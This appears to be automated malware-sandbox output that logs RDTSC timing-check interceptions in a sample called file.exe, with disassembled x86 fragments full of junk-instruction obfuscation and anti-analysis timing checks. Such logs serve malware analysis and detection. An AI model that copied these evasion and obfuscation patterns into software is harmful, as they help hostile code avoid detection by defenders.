Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AA6157 second address: AA617D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 push edi 0x0000000a pop edi 0x0000000b jbe 00007FFAA4EF80C6h 0x00000011 push eax 0x00000012 pop eax 0x00000013 jmp 00007FFAA4EF80CEh 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c pop eax 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AA617D second address: AA6181 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AA6181 second address: AA619D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFAA4EF80D6h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AA619D second address: AA61A2 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AAEA71 second address: AAEA8F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAA4EF80D5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AAEA8F second address: AAEAC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFAA4B0AF25h 0x00000009 popad 0x0000000a jmp 00007FFAA4B0AF28h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AAEC2F second address: AAEC33 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AAEC33 second address: AAEC3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AAEDC4 second address: AAEDCA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AAF236 second address: AAF23A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AAF3C6 second address: AAF3CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AAF54A second address: AAF54E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AAF7CC second address: AAF7D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AAF7D4 second address: AAF7D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AAF7D8 second address: AAF7DE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AB2878 second address: AB287C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AB292B second address: AB2930 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AB2930 second address: AB2949 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 push edx 0x0000000a jnp 00007FFAA4B0AF16h 0x00000010 pop edx 0x00000011 push eax 0x00000012 push edx 0x00000013 jno 00007FFAA4B0AF16h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AB2949 second address: AB294D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AB2C23 second address: AB2C2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push esi 0x00000008 pop esi 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AB5EA4 second address: AB5EC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFAA4EF80CBh 0x00000009 je 00007FFAA4EF80C6h 0x0000000f push edx 0x00000010 pop edx 0x00000011 popad 0x00000012 pop edi 0x00000013 push eax 0x00000014 push edx 0x00000015 js 00007FFAA4EF80D2h 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AB5EC7 second address: AB5ECD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AB5ECD second address: AB5ED1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AB5A73 second address: AB5A88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FFAA4B0AF16h 0x0000000a pop esi 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f jno 00007FFAA4B0AF16h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AB5A88 second address: AB5A8C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DB074A second address: 4DB074E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DB074E second address: 4DB0754 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DB0754 second address: 4DB0783 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAA4B0AF23h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ecx 0x0000000a pushad 0x0000000b push ecx 0x0000000c mov ch, dl 0x0000000e pop ecx 0x0000000f mov edx, 08724C20h 0x00000014 popad 0x00000015 call dword ptr [74E5188Ch] 0x0000001b mov edi, edi 0x0000001d push ebp 0x0000001e mov ebp, esp 0x00000020 push ecx 0x00000021 mov ecx, dword ptr [7FFE0004h] 0x00000027 mov dword ptr [ebp-04h], ecx 0x0000002a cmp ecx, 01000000h 0x00000030 jc 00007FFAA4B3C9F5h 0x00000036 mov eax, 7FFE0320h 0x0000003b mov eax, dword ptr [eax] 0x0000003d mul ecx 0x0000003f shrd eax, edx, 00000018h 0x00000043 mov esp, ebp 0x00000045 pop ebp 0x00000046 ret 0x00000047 push eax 0x00000048 push edx 0x00000049 push eax 0x0000004a push edx 0x0000004b push eax 0x0000004c push edx 0x0000004d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DB0783 second address: 4DB0787 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DB0787 second address: 4DB0797 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAA4B0AF1Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4DB0797 second address: 4DB06AB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, 1F8C4114h 0x00000008 jmp 00007FFAA4EF80CDh 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pop ecx 0x00000011 pushad 0x00000012 call 00007FFAA4EF80CCh 0x00000017 pushfd 0x00000018 jmp 00007FFAA4EF80D2h 0x0000001d add cx, 23F8h 0x00000022 jmp 00007FFAA4EF80CBh 0x00000027 popfd 0x00000028 pop esi 0x00000029 jmp 00007FFAA4EF80D9h 0x0000002e popad 0x0000002f ret 0x00000030 nop 0x00000031 xor esi, eax 0x00000033 lea eax, dword ptr [ebp-10h] 0x00000036 push eax 0x00000037 call 00007FFAA98A5867h 0x0000003c mov edi, edi 0x0000003e jmp 00007FFAA4EF80CDh 0x00000043 xchg eax, ebp 0x00000044 pushad 0x00000045 mov bh, ah 0x00000047 mov ecx, ebx 0x00000049 popad 0x0000004a push eax 0x0000004b push eax 0x0000004c push edx 0x0000004d jmp 00007FFAA4EF80D1h 0x00000052 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D90058 second address: 4D9005E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D9005E second address: 4D90091 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 jmp 00007FFAA4EF80D9h 0x0000000e mov ebp, esp 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FFAA4EF80CDh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D90091 second address: 4D90097 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D90097 second address: 4D9009B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D9009B second address: 4D900BD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr fs:[00000030h] 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FFAA4B0AF22h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D900BD second address: 4D900DE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAA4EF80CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub esp, 18h 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f jmp 00007FFAA4EF80CBh 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D900DE second address: 4D900E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D900E4 second address: 4D900E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D900E8 second address: 4D9017C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAA4B0AF1Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FFAA4B0AF1Dh 0x00000013 and cx, CAC6h 0x00000018 jmp 00007FFAA4B0AF21h 0x0000001d popfd 0x0000001e popad 0x0000001f push eax 0x00000020 pushad 0x00000021 call 00007FFAA4B0AF27h 0x00000026 pushfd 0x00000027 jmp 00007FFAA4B0AF28h 0x0000002c sub esi, 676DADC8h 0x00000032 jmp 00007FFAA4B0AF1Bh 0x00000037 popfd 0x00000038 pop eax 0x00000039 movsx ebx, cx 0x0000003c popad 0x0000003d xchg eax, ebx 0x0000003e push eax 0x0000003f push edx 0x00000040 push eax 0x00000041 push edx 0x00000042 jmp 00007FFAA4B0AF1Ah 0x00000047 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D9017C second address: 4D90180 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D90180 second address: 4D90186 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D90186 second address: 4D9022F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAA4EF80CEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebx, dword ptr [eax+10h] 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FFAA4EF80CEh 0x00000013 sbb cx, 6288h 0x00000018 jmp 00007FFAA4EF80CBh 0x0000001d popfd 0x0000001e pushfd 0x0000001f jmp 00007FFAA4EF80D8h 0x00000024 and ch, FFFFFFE8h 0x00000027 jmp 00007FFAA4EF80CBh 0x0000002c popfd 0x0000002d popad 0x0000002e xchg eax, esi 0x0000002f jmp 00007FFAA4EF80D6h 0x00000034 push eax 0x00000035 pushad 0x00000036 jmp 00007FFAA4EF80D1h 0x0000003b call 00007FFAA4EF80D0h 0x00000040 mov si, CCC1h 0x00000044 pop esi 0x00000045 popad 0x00000046 xchg eax, esi 0x00000047 push eax 0x00000048 push edx 0x00000049 pushad 0x0000004a push ecx 0x0000004b pop edi 0x0000004c mov di, ax 0x0000004f popad 0x00000050 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D9022F second address: 4D9023D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FFAA4B0AF1Ah 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D9023D second address: 4D90309 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov esi, dword ptr [74E806ECh] 0x0000000e pushad 0x0000000f pushad 0x00000010 mov bh, D7h 0x00000012 mov ecx, 6DDB679Bh 0x00000017 popad 0x00000018 mov ah, E2h 0x0000001a popad 0x0000001b test esi, esi 0x0000001d jmp 00007FFAA4EF80D3h 0x00000022 jne 00007FFAA4EF909Eh 0x00000028 jmp 00007FFAA4EF80D6h 0x0000002d xchg eax, edi 0x0000002e pushad 0x0000002f mov ecx, 4858069Dh 0x00000034 mov ecx, 6D336F99h 0x00000039 popad 0x0000003a push eax 0x0000003b jmp 00007FFAA4EF80CFh 0x00000040 xchg eax, edi 0x00000041 pushad 0x00000042 pushfd 0x00000043 jmp 00007FFAA4EF80D4h 0x00000048 sub ch, 00000058h 0x0000004b jmp 00007FFAA4EF80CBh 0x00000050 popfd 0x00000051 pushad 0x00000052 pushad 0x00000053 popad 0x00000054 mov bh, ch 0x00000056 popad 0x00000057 popad 0x00000058 call dword ptr [74E50B60h] 0x0000005e mov eax, 750BE5E0h 0x00000063 ret 0x00000064 jmp 00007FFAA4EF80D7h 0x00000069 push 00000044h 0x0000006b push eax 0x0000006c push edx 0x0000006d jmp 00007FFAA4EF80D5h 0x00000072 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D90309 second address: 4D90345 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAA4B0AF21h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a pushad 0x0000000b call 00007FFAA4B0AF1Ch 0x00000010 pop edx 0x00000011 push ecx 0x00000012 push edx 0x00000013 pop esi 0x00000014 pop ebx 0x00000015 popad 0x00000016 xchg eax, edi 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007FFAA4B0AF1Eh 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D90345 second address: 4D9034B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D9034B second address: 4D9039B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAA4B0AF1Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FFAA4B0AF1Bh 0x0000000f xchg eax, edi 0x00000010 jmp 00007FFAA4B0AF26h 0x00000015 push dword ptr [eax] 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007FFAA4B0AF27h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D903FC second address: 4D90459 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, cx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov esi, eax 0x0000000d jmp 00007FFAA4EF80CCh 0x00000012 test esi, esi 0x00000014 jmp 00007FFAA4EF80D0h 0x00000019 je 00007FFB14F67347h 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 pushfd 0x00000023 jmp 00007FFAA4EF80CDh 0x00000028 sub eax, 3DA4C906h 0x0000002e jmp 00007FFAA4EF80D1h 0x00000033 popfd 0x00000034 mov ebx, esi 0x00000036 popad 0x00000037 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D90459 second address: 4D9045F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D9045F second address: 4D90463 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D90463 second address: 4D904CB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAA4B0AF1Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b sub eax, eax 0x0000000d pushad 0x0000000e push ebx 0x0000000f pushfd 0x00000010 jmp 00007FFAA4B0AF20h 0x00000015 sbb esi, 5100B208h 0x0000001b jmp 00007FFAA4B0AF1Bh 0x00000020 popfd 0x00000021 pop ecx 0x00000022 jmp 00007FFAA4B0AF29h 0x00000027 popad 0x00000028 mov dword ptr [esi], edi 0x0000002a push eax 0x0000002b push edx 0x0000002c jmp 00007FFAA4B0AF1Dh 0x00000031 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D904CB second address: 4D9056C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushfd 0x00000006 jmp 00007FFAA4EF80CDh 0x0000000b add cx, CE86h 0x00000010 jmp 00007FFAA4EF80D1h 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 mov dword ptr [esi+04h], eax 0x0000001c jmp 00007FFAA4EF80CEh 0x00000021 mov dword ptr [esi+08h], eax 0x00000024 jmp 00007FFAA4EF80D0h 0x00000029 mov dword ptr [esi+0Ch], eax 0x0000002c jmp 00007FFAA4EF80D0h 0x00000031 mov eax, dword ptr [ebx+4Ch] 0x00000034 push eax 0x00000035 push edx 0x00000036 pushad 0x00000037 pushad 0x00000038 popad 0x00000039 pushfd 0x0000003a jmp 00007FFAA4EF80D3h 0x0000003f adc eax, 37C1CFCEh 0x00000045 jmp 00007FFAA4EF80D9h 0x0000004a popfd 0x0000004b popad 0x0000004c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D9056C second address: 4D90572 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D90572 second address: 4D90655 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esi+10h], eax 0x0000000b jmp 00007FFAA4EF80CFh 0x00000010 mov eax, dword ptr [ebx+50h] 0x00000013 pushad 0x00000014 jmp 00007FFAA4EF80D4h 0x00000019 jmp 00007FFAA4EF80D2h 0x0000001e popad 0x0000001f mov dword ptr [esi+14h], eax 0x00000022 pushad 0x00000023 pushfd 0x00000024 jmp 00007FFAA4EF80CEh 0x00000029 add ch, 00000008h 0x0000002c jmp 00007FFAA4EF80CBh 0x00000031 popfd 0x00000032 mov esi, 07DDCF7Fh 0x00000037 popad 0x00000038 mov eax, dword ptr [ebx+54h] 0x0000003b jmp 00007FFAA4EF80D2h 0x00000040 mov dword ptr [esi+18h], eax 0x00000043 jmp 00007FFAA4EF80D0h 0x00000048 mov eax, dword ptr [ebx+58h] 0x0000004b jmp 00007FFAA4EF80D0h 0x00000050 mov dword ptr [esi+1Ch], eax 0x00000053 jmp 00007FFAA4EF80D0h 0x00000058 mov eax, dword ptr [ebx+5Ch] 0x0000005b pushad 0x0000005c pushfd 0x0000005d jmp 00007FFAA4EF80CEh 0x00000062 sub ah, 00000028h 0x00000065 jmp 00007FFAA4EF80CBh 0x0000006a popfd 0x0000006b pushad 0x0000006c movzx eax, di 0x0000006f push eax 0x00000070 push edx 0x00000071 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D90655 second address: 4D906C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov dword ptr [esi+20h], eax 0x00000009 jmp 00007FFAA4B0AF27h 0x0000000e mov eax, dword ptr [ebx+60h] 0x00000011 jmp 00007FFAA4B0AF26h 0x00000016 mov dword ptr [esi+24h], eax 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c push ebx 0x0000001d pop ecx 0x0000001e pushfd 0x0000001f jmp 00007FFAA4B0AF29h 0x00000024 or ah, 00000006h 0x00000027 jmp 00007FFAA4B0AF21h 0x0000002c popfd 0x0000002d popad 0x0000002e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D906C6 second address: 4D906D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FFAA4EF80CCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D906D6 second address: 4D906E9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [ebx+64h] 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e mov ebx, 7E160E3Eh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D906E9 second address: 4D907E9 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FFAA4EF80CFh 0x00000008 xor ecx, 120082EEh 0x0000000e jmp 00007FFAA4EF80D9h 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 pushfd 0x00000017 jmp 00007FFAA4EF80D0h 0x0000001c add eax, 6ACD7A68h 0x00000022 jmp 00007FFAA4EF80CBh 0x00000027 popfd 0x00000028 popad 0x00000029 mov dword ptr [esi+28h], eax 0x0000002c jmp 00007FFAA4EF80D6h 0x00000031 mov eax, dword ptr [ebx+68h] 0x00000034 jmp 00007FFAA4EF80D0h 0x00000039 mov dword ptr [esi+2Ch], eax 0x0000003c pushad 0x0000003d pushfd 0x0000003e jmp 00007FFAA4EF80CEh 0x00000043 adc ax, CF28h 0x00000048 jmp 00007FFAA4EF80CBh 0x0000004d popfd 0x0000004e call 00007FFAA4EF80D8h 0x00000053 mov bl, ah 0x00000055 pop ebx 0x00000056 popad 0x00000057 mov ax, word ptr [ebx+6Ch] 0x0000005b pushad 0x0000005c mov ecx, 5714A5FFh 0x00000061 pushfd 0x00000062 jmp 00007FFAA4EF80D4h 0x00000067 xor ecx, 2864E3E8h 0x0000006d jmp 00007FFAA4EF80CBh 0x00000072 popfd 0x00000073 popad 0x00000074 mov word ptr [esi+30h], ax 0x00000078 push eax 0x00000079 push edx 0x0000007a push eax 0x0000007b push edx 0x0000007c pushad 0x0000007d popad 0x0000007e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D907E9 second address: 4D90804 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAA4B0AF27h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D90804 second address: 4D90828 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop esi 0x00000005 push ebx 0x00000006 pop esi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov ax, word ptr [ebx+00000088h] 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FFAA4EF80CFh 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D90828 second address: 4D9082E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D9082E second address: 4D9089F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAA4EF80D4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov word ptr [esi+32h], ax 0x0000000d jmp 00007FFAA4EF80D0h 0x00000012 mov eax, dword ptr [ebx+0000008Ch] 0x00000018 jmp 00007FFAA4EF80D0h 0x0000001d mov dword ptr [esi+34h], eax 0x00000020 jmp 00007FFAA4EF80D0h 0x00000025 mov eax, dword ptr [ebx+18h] 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007FFAA4EF80D7h 0x0000002f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D9089F second address: 4D908ED instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, di 0x00000006 push edi 0x00000007 pop ecx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esi+38h], eax 0x0000000e pushad 0x0000000f pushad 0x00000010 mov eax, edx 0x00000012 pushfd 0x00000013 jmp 00007FFAA4B0AF25h 0x00000018 jmp 00007FFAA4B0AF1Bh 0x0000001d popfd 0x0000001e popad 0x0000001f mov edx, ecx 0x00000021 popad 0x00000022 mov eax, dword ptr [ebx+1Ch] 0x00000025 push eax 0x00000026 push edx 0x00000027 jmp 00007FFAA4B0AF21h 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D908ED second address: 4D908FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FFAA4EF80CCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D908FD second address: 4D90928 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAA4B0AF1Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esi+3Ch], eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FFAA4B0AF25h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D90928 second address: 4D9092D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
